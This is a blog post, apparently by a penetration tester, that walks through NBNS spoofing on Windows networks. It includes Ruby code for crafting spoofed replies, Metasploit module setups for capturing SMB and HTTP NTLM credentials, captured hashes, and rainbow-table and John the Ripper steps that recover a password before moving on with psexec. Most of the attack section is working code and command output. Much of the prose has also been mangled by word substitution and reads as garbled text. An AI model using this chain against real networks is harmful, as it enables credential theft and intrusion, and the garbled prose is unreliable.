-->
Nbns Spoofing On Your Trend To Globe Domination

Nbns Spoofing On Your Trend To Globe Domination

Nbns Spoofing On Your Trend To Globe Domination

I few weeks agone I helped on the Red Team at the Midwest CCDC contest inward Minneapolis (actually St. Paul, but unopen enough). There were unopen to talented guys at that topographic point together with it was a lot of fun beating on those pitiful kids. I highly recommend yous volunteer at events similar this. You haven't lived until you've piece of cake ripped the legs off a alive domain controller spell the possessor sits together with watches, alongside no mightiness to practise anything most it (vnc + disabled mouse together with keyboard).

Whenever I larn together alongside a grouping of people similar this, I similar to telephone commutation techniques together with discuss trends. We discussed our paths of to the lowest degree resistance for internal tests, together with I mentioned that my favorite are the attacks based on spoofing NetBIOS Name Service (NBNS) Responses. It is the rattling origin tool I burn upwards on internal penetration tests, together with it is rattling valuable on wireless penetration tests where customer laptops are inward scope. Before nosotros larn into the assault method I'll larn over a fleck of the background on what NBNS is.

When your Windows box needs to determine the IP address for a given name, it tries, inward order, the next lookup methods:
  • local hosts file - C:\Windows\System32\drivers\etc\hosts

  • DNS

  • NBNS


You may wonder, how many queries larn far yesteryear DNS? The respond is, a lot! Any fatty fingered internal server name, a laptop looking for its domain network resources spell on unopen to other network, or would live on spider web searches volition generate this traffic. You may ask, spider web searches, huh? We opened upwards our browser together with type inward "packetstan" inward the address bar, what does the browser do?

Modern browsers allow yous to search via the address bar (Chrome doesn't fifty-fifty take away maintain a dedicated search box), together with the browser needs to determine if the text is a host or a query. If the string has spaces, it is evidently a search request. If at that topographic point are no spaces the browser doesn't know if nosotros wishing a server named "packetstan" or nosotros wishing to search google/yahoo/bing for "packetstan", but it origin tries to access a host named "packetstan" together with therefor needs to exertion to resolve the IP for the host. i.e. I practise a search for "puppies" yesteryear browser volition exertion to larn an IP address for "puppies" (how cute).

The hosts file isn't going to take away maintain an entry for "packetstan", together with DNS is going to neglect to lookup "packetstan" (no .com). So nosotros province on NBNS. Here is a covert shot of the transaction:

I few weeks agone I helped on the Red Team at the  NBNS Spoofing on your way to World Domination

Since the await upwards is only a hostname, windows adds the local DNS suffix to the query together with asks its DNS server(s). The suffix picked upwards my the Windows box commonly comes from the DHCP server. As yous tin sack see, the DNS server replied that it had no sentiment on how to lookup that name. Next, you'll run into the NBNS Request. The beautiful affair is, the NBNS Request is a broadcast, therefore anyone tin sack reply easily together with redirect traffic.

If nosotros wanted to toxicant a DNS lookup nosotros would take away maintain to somehow larn inward the middle of the traffic, together with that takes unopen to additional effort. NBNS is therefore piece of cake I tin sack fifty-fifty practise it earlier I take away maintain my origin loving cup of coffee, equally I commonly salve MITM attacks until afterwards a few cups of joe.

Wesley McGrew wrote a tool to forge NBNS replies. He also has a great three part series on the protocol together with the tool writing process. Fans of this weblog should genuinely banking concern check out those posts. Now that nosotros take away maintain improve agreement of NBNS, how practise nosotros spoof a reply?

To spoof an NBNS reply, nosotros demand to arts and crafts a reply bundle that has the same Transaction ID equally the request. The Transaction ID is similar to the i used yesteryear DNS (BTW, the numbers sequential together with are reset to \x80\x00 afterwards each reboot). We also demand to specify the IP address to ship inward the reply. For all intents together with purposes, the residue of each response bundle tin sack live on static.

Mr. McGrew's tool does what nosotros described above, but I wanted it inward Metasploit, which way rewriting it inward ruby. Unfortunately, Racket, the bundle crafting tool for Ruby, doesn't take away maintain a module for NetBIOS, therefore we'll manually dissassemble the bundle together with practise a raw reply packet.

Using WireShark equally a guide, nosotros tin sack describe apart the packet, piece yesteryear piece.

nbnsq_transid      = packet[0..1] nbnsq_flags        = packet[2..3] nbnsq_questions    = packet[4..5] nbnsq_answerrr     = packet[6..7] nbnsq_authorityrr  = packet[8..9] nbnsq_additionalrr = packet[10..11] nbnsq_name         = packet[12..45] nbnsq_type         = packet[46..47] nbnsq_class        = packet[48..49]


As previously mentioned, all nosotros genuinely demand is the Transaction ID together with the Name. The Transaction ID is genuinely uncomplicated equally it is only 2 bytes, but what if nosotros wishing to read the name? The raw call looks similar this:

\x20FAEBEDELEFFEFDFEEBEOCACACACACAAA\00


The leading infinite together with trailing nil byte are apparent, but what variety of encoding is used here? Master McGrew describes it inward the second portion of his weblog post. Each grapheme inward our query ("PACKETSTAN") is dissever into nibbles (half bytes) together with each nibble is added to \x41 (A), similar this:
  • P = \x50

  • 1st nibble = 5, mo nibble is 0

  • 41 + five = 46 together with \x46 = F

  • 41 + 0 = 41 together with \x41 = A

  • P is together with then encoded equally FA


We tin sack decode together with encode our call alongside this fleck of ruby (remember hex 41 equals decimal 65):

nbnsq_name.slice(1..-2).each_byte practise |c|     decoded << "#{(c - 65).to_s(16)}" destination nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()


We skip the origin (space) together with terminal (null) bytes together with subtract 65 from each therefore nosotros destination upwards alongside "5041434B45545354414E20202020". We convert that into ASCII characters together with strip the trailing spaces to larn "PACKETSTAN".

Fortunately, nosotros don't genuinely demand to re-encode the string since nosotros tin sack only usage the master inward our reply. However, I usage this string to check a regular human face therefore nosotros only reply to the in-scope clients.

if (nbnsq_decodedname =  /#{datastore['REGEX']}/i)     ...


The raw response bundle is together with then created. You'll uncovering that most of our bundle is static or taken straight from the Request packet.
response = nbnsq_transid +     "\x85\x00" + # Flags = response + authoratative + recursion desired      "\x00\x00" + # Questions = 0     "\x00\x01" + # Answer RRs = 1     "\x00\x00" + # Authority RRs = 0     "\x00\x00" + # Additional RRs = 0     nbnsq_name + # master query call     nbnsq_type + # Type = NB ...whatever that way     nbnsq_class+ # Class = IN     "\x00\x04\x93\xe0" + # TTL = a long donkey fourth dimension     "\x00\x06" + # Datalength = vi     "\x00\x00" + # Flags B-node, unique = whet ever that way     datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')


The terminal line of piece of occupation takes the IP address to spoof together with converts it to bytes (i.e. 1.2.3.4 -> \x01\x02\x03\x04). Fortunately, the bytes are big endian, therefore nosotros don't take away maintain to rearrange the order.

Now nosotros tin sack run the module inward Metasploit:

msf > use auxiliary/spoof/nbns/nbns_response msf auxiliary(nbns) > exhibit options  Module options (auxiliary/spoof/nbns/nbns_response):     Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    REGEX    .*               aye       Regex applied to determene if spoofed reply is sent    SPOOFIP                   aye       IP address alongside which to toxicant responses    VERBOSE  truthful             no        Determines whether to display responses  msf auxiliary(nbns_response) > set spoofip 192.168.1.52 spoofip => 192.168.1.52 msf auxiliary(nbns_response) > run [*] Auxiliary module execution completed  [*] NBNS Spoofer initializing [*] NBNS Spoofer initialed. Waiting for packets...


The default regular human face volition check whatsoever query, together with when i is flora yous volition run into a message similar this:

[*] Regex matched PACKETSTAN from 192.168.1.51. Sending reply...


Ok, great, therefore nosotros sent a reply together with take away maintain poisoned a call lookup. So what?

We tin sack usage Metasploit to setup a few simulated services. That way, if a host lookup was for a spider web server or a file server (smb) the user volition live on directed to our Metasploit instance. The Metasploit modules inward inquiry volition asking authentication, together with the customer volition happily ship it credentials (sort of).


msf > use auxiliary/server/capture/smb msf auxiliary(smb) > set JOHNPWFILE /home/tm/johnsmb JOHNPWFILE => /home/tm/johnsmb msf auxiliary(smb) > exhibit options   Module options (auxiliary/server/capture/smb):     Name        Current Setting   Required  Description    ----        ---------------   --------  -----------    CAINPWFILE                    no        The local filename to shop the hashes inward Cain&Abel format    CHALLENGE   1122334455667788  aye       The 8 byte challenge     JOHNPWFILE  /home/tm/johnsmb  no        The prefix to the local filename to shop the hashes inward JOHN format    LOGFILE                       no        The local filename to shop the captured hashes    SRVHOST     0.0.0.0           aye       The local host to psyche on. This must live on an address on the local machine or 0.0.0.0    SRVPORT     445               aye       The local port to psyche on.    SSL         mistaken             no        Negotiate SSL for incoming connections    SSLVersion  SSL3              no        Specify the version of SSL that should live on used (accepted: SSL2, SSL3, TLS1)  msf auxiliary(smb) > run [*] Auxiliary module execution completed  [*] Server started.  msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm msf auxiliary(http_ntlm) > set LOGFILE /home/tm/httplog LOGFILE => /home/tm/johnhttp msf auxiliary(http_ntlm) > set URIPATH / URIPATH => / msf auxiliary(http_ntlm) > set SRVPORT 80 SRVPORT => lxxx msf auxiliary(http_ntlm) > show options  Module options (auxiliary/server/capture/http_ntlm):     Name        Current Setting   Required  Description    ----        ---------------   --------  -----------    LOGFILE     /home/tm/httplog  no        The local filename to shop the captured hashes    PWFILE                        no        The local filename to shop the hashes inward Cain&Abel format    SRVHOST     0.0.0.0           aye       The local host to psyche on. This must live on an address on the local machine or 0.0.0.0    SRVPORT     lxxx                aye       The local port to psyche on.    SSL         mistaken             no        Negotiate SSL for incoming connections    SSLVersion  SSL3              no        Specify the version of SSL that should live on used (accepted: SSL2, SSL3, TLS1)    URIPATH     /                 no        The URI to usage for this exploit (default is random)


Any Windows box that access our SMB part volition automatically assay to authenticate. The spider web browser is a dissimilar story, together with depends on the browser together with if the customer machine is joined to a domain. It volition either ship credentials automatically or prompt the user for credentials. The tabular array below describes when credentials are automatically sent, together with when they aren't.




BrowserDomain JoinedStandalone (Non-Domain)
ChromeAutomaticPerforms Google Search
IEAutomaticUser Prompted
FireFoxUser PromptedUser Prompted


Most of the machines inward compass for my exam are joined to the corporate domain, therefore this assault plant great! Influenza A virus subtype H5N1 Windows box that is role of a domain treats hosts, non FQDN hostnames, equally role of its "Local Intranet Zone". This zone has all sorts of settings to brand unmarried sign-on easier. IE together with Chrome both usage this "Local Intranet Zone", spell Firefox does not.

After typing "packetstan" into my browser inward Chrome on my domain-joined host, Metasploit gives me this output:

[*] Regex matched PACKETSTAN from 192.168.1.61. Sending reply... [*] Request '/' from 192.168.1.61:1134 [*] Request '/' from 192.168.1.61:1134 [*] Request '/' from 192.168.1.61:1134 [*] 192.168.1.61: MYDOM\tim 4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f:       44a8674da9a460bca9c615c79a72adad83b5af7ec07eac05 on ALPHA


If nosotros await at the log file we'll run into this:

$ truthful cat httplog  Thu Mar 31 18:18:18 -0500 2011:192.168.1.61:MYDOM:packetstan:tim:4f717259791a8a3d 6a11ae4050ed5c72ee125c7119e2a20f:44a8674da9a460bca9c615c79a72adad83b5af7ec07eac05


The SMB capture module volition output a John the Ripper compatible file. However, the http_ntlm module doesn't give us a the file format nosotros wishing (I'm working on a fix), therefore we'll take away maintain to modify the file to await similar this:
<user>:::<LMHASH>:<NTLMHASH>:<CHALLENGE> (wrapped for space, the genuinely file won't live on wrapped):

MYDOM\tim:::4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f: 44a8674da9a460bca9c615c79a72adad83b5af7ec07eac05:1122334455667788


Note: Windows 7 together with Windows 2008 volition non render a LM Hash together with whatsoever farther steps volition non operate equally these steps rely on the weak LM Hash. You tin sack even therefore animate existence forcefulness the NetNTLMv2 hash, but at that topographic point are no shortcuts.

The hashes sent via SMB or HTTP aren't your straight LH together with NTLM hashes. While the total details requires a separate weblog post, the brusque version is they are salted alongside a challenge to "ensure" they can't live on reused. However, Metasploit uses a static challenge (1122334455667788) therefore nosotros tin sack usage rainbow tables to cleft the password. The tables tin sack live on used alongside rcracki together with the halflmchall_alpha-numeric (smaller) or halflmchall_all-space (larger) tables are available from freerainbowtables.com. You tin sack download both of them (28GB) via wget similar this:

$ wget -r ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/


All nosotros demand to practise is run our hash against the rainbow table. We demand the origin sixteen characters of the LM hash output (8 bytes of LM hash) together with the path to the rainbow tables.

$ ./rcracki_mt -h 4f717259791a8a3d /storage/RainbowTables/halflmchall_alpha-numeric/ [sudo] password for tm: Using 3 threads for pre-calculation together with mistaken alert checking... Found iv rainbowtable files...  halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti: file length mismatch  halflmchall_alpha-numeric#1-7_1_2400x56281894_1122334455667788_distrrtgen[p][i]_0.rti: reading index... 13528977 bytes read, disk access time: 0.01 s reading table... 450255152 bytes read, disk access time: 0.35 s verifying the file... ok searching for 1 hash... plaintext of 4f717259791a8a3d is MYPASSW cryptanalysis time: 3.40 s  statistics ------------------------------------------------------- plaintext found:          1 of 1 (100.00%) total disk access time:   0.36 s total cryptanalysis time: 3.40 s total chain walk step:    2876401 total mistaken alarm:        840 total chain walk mensuration due to mistaken alarm: 825144  resultant ------------------------------------------------------- 4f717259791a8a3d        MYPASSW hex:4d595041535357


In 3.4 brusque seconds nosotros take away maintain the origin vii characters of the password. The latest version (at the fourth dimension of writing) of John the Ripper (1.7.6-jumbo12) has a perl file named netntlm.pl that volition bruteforce the mo portion of the password. We only demand to give it the origin portion of the password together with a john compatible file (output trimmed).

$ perl netntlm.pl --seed MYPASSW --file  /john-http   ########################################################################################### The next LM responses take away maintain been previously cracked:  The next NTLM responses take away maintain been previously cracked:   ########################################################################################### Isolating accounts which take away maintain only had their LM response cracked. Account MYDOM\\tim LM response added to smashing list.  ... Loaded 1 password hash (LM C/R DES [netlm]) MYPASSWORD1      (MYDOM\\tim) guesses: 1  time: 0:00:00:26  c/s: 515198  trying: MYPASSWORD1


We tin sack run into that my password is MYPASSWORD1. However, LM passwords are representative insensitive together with are e'er presented upper case. To larn the representative sensitive password nosotros run the *same* command again. The mo top volition usage "MYPASSWORD1" against the representative sensitive NTLM hash.

$ perl netntlm.pl --seed MYPASSW --file  /john-http   ########################################################################################### The next LM responses take away maintain been previously cracked:  MYDOM\tim:MYPASSWORD1::4f717259791a8a3d6a11ae4050ed5c72ee125c7119e2a20f:44(trimmed)  The next NTLM responses take away maintain been previously cracked:  ... Performing NTLM case-sensitive cleft for account: MYDOM\tim. guesses: 1  time: 0:00:00:00 100.00% (ETA: Thu Mar 31 12:57:51 2011)  c/s: 3352  trying: MyPassword1 Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm]) MyPassword1      (MYDOM\tim) ...


We straight off take away maintain the representative sensitive password. Awesome!

In summary, to usage this method perform the next steps:
  • Start the next Metasploit modules
    • auxiliary/spoof/nbns/nbns

    • auxiliary/server/capture/smb

    • auxiliary/server/capture/http_ntlm

  • Crack the origin one-half of the LM hash alongside rainbow tables

  • Brute forcefulness the mo one-half of the password alongside john's netntlm.pl

  • Run the same netntlm.pl over again to larn the representative sensitive password


This method volition commonly yield credentials pretty quickly, but to larn unopen to higher privileged accounts only hold off a while.

Once yous take away maintain a cracked password yous tin sack (usually) connect to boxes all over the identify yesteryear using Metasploit's exploit/windows/smb/psexec module.

The foreclose this assault from existence equally effective, yous demand to modify the LAN Manager authentication level to turn down LM via GPO. It isn't plenty to usage "Send NTLM response only" or "Send NTLMv2 response only".
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser